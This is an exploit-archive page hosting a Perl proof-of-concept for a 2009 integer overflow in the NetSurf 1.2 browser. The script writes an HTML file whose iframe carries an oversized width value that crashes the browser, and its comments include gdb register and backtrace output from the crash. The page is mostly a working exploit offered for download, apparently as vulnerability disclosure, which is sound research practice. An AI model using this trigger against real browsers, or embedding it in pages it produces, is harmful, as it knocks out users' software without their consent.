the last unbiased stronghold

NetSurf 1.2 width Integer Overflow Proof Of Concept

NetSurf 1.2 width Integer Overflow Proof Of Concept
Posted Jan 15, 2009
Authored by Jeremy Brown | Site jbrownsec.blogspot.com

NetSurf version 1.2 width remote integer overflow proof of concept exploit.

tags | exploit, remote, overflow, proof of concept
MD5 | 0c7684f810f8af17eec26eac56e1a747

NetSurf 1.2 width Integer Overflow Proof Of Concept

Change Mirror Download
#!/usr/bin/perl
# netsurf_width_intof2.pl
# Netsurf 1.2 'width' Remote Integer Overflow PoC Exploit
# Jeremy Brown [0xjbrown41@gmail.com/jbrownsec.blogspot.com]
#
# Program received signal SIGABRT, Aborted.
# [Switching to Thread 0xb6d78720 (LWP 28933)]
# 0xb804e430 in __kernel_vsyscall ()
# (gdb) i r
# eax 0x0 0
# ecx 0x7105 28933
# edx 0x6 6
# ebx 0x7105 28933
# esp 0xbfb4cfe4 0xbfb4cfe4
# ebp 0xbfb4cffc 0xbfb4cffc
# esi 0xb7532b97 -1219286121
# edi 0xb754fff4 -1219166220
# eip 0xb804e430 0xb804e430 <__kernel_vsyscall+16>
# eflags 0x206 [ PF IF ]
# cs 0x73 115
# ss 0x7b 123
# ds 0x7b 123
# es 0x7b 123
# fs 0x0 0
# gs 0x33 51
# (gdb) bt
# 0 0xb804e430 in __kernel_vsyscall ()
# 1 0xb7421880 in raise () from /lib/tls/i686/cmov/libc.so.6
# 2 0xb7423248 in abort () from /lib/tls/i686/cmov/libc.so.6
# 3 0xb741a72e in __assert_fail () from /lib/tls/i686/cmov/libc.so.6
# 4 0x080a7cdd in ?? ()
# 5 0x080a75e2 in ?? ()
# 6 0x080a747d in ?? ()
# 7 0x080ab3f0 in layout_document ()
# 8 0x0809f073 in html_reformat ()
# 9 0x080a0d95 in html_convert ()
# 10 0x0805980c in content_convert ()
# 11 0x0805cc49 in ?? ()
# 12 0x0805a6c1 in fetch_send_callback ()
# 13 0x08060c23 in ?? ()
# 14 0x0806110f in ?? ()
# 15 0x0805afe9 in fetch_poll ()
# 16 0x08088276 in gui_poll ()
# 17 0x0807fe94 in main ()
#
# Adv Ref: netsurf_multiple_adv.txt

$filename = $ARGV[0];
if(!defined($filename))
{

print "Usage: $0 <filename.html>\n";

}

$head = "<html>" . "\n";
$trig = "<iframe src=\"test.jpg\" width=\"2147483584\">" . "\n";
#$trig = "<hr width=\"2147483584\">" . "\n";
$foot = "</html>";

$data = $head . $trig . $foot;

open(FILE, '>' . $filename);
print FILE $data;
close(FILE);

exit;

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

May 2012

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    May 1st
    37 Files
  • 2
    May 2nd
    53 Files
  • 3
    May 3rd
    33 Files
  • 4
    May 4th
    4 Files
  • 5
    May 5th
    10 Files
  • 6
    May 6th
    17 Files
  • 7
    May 7th
    19 Files
  • 8
    May 8th
    36 Files
  • 9
    May 9th
    34 Files
  • 10
    May 10th
    35 Files
  • 11
    May 11th
    20 Files
  • 12
    May 12th
    18 Files
  • 13
    May 13th
    11 Files
  • 14
    May 14th
    27 Files
  • 15
    May 15th
    58 Files
  • 16
    May 16th
    54 Files
  • 17
    May 17th
    25 Files
  • 18
    May 18th
    53 Files
  • 19
    May 19th
    9 Files
  • 20
    May 20th
    15 Files
  • 21
    May 21st
    25 Files
  • 22
    May 22nd
    32 Files
  • 23
    May 23rd
    35 Files
  • 24
    May 24th
    26 Files
  • 25
    May 25th
    25 Files
  • 26
    May 26th
    0 Files
  • 27
    May 27th
    0 Files
  • 28
    May 28th
    0 Files
  • 29
    May 29th
    0 Files
  • 30
    May 30th
    0 Files
  • 31
    May 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2012 Packet Storm. All rights reserved.

close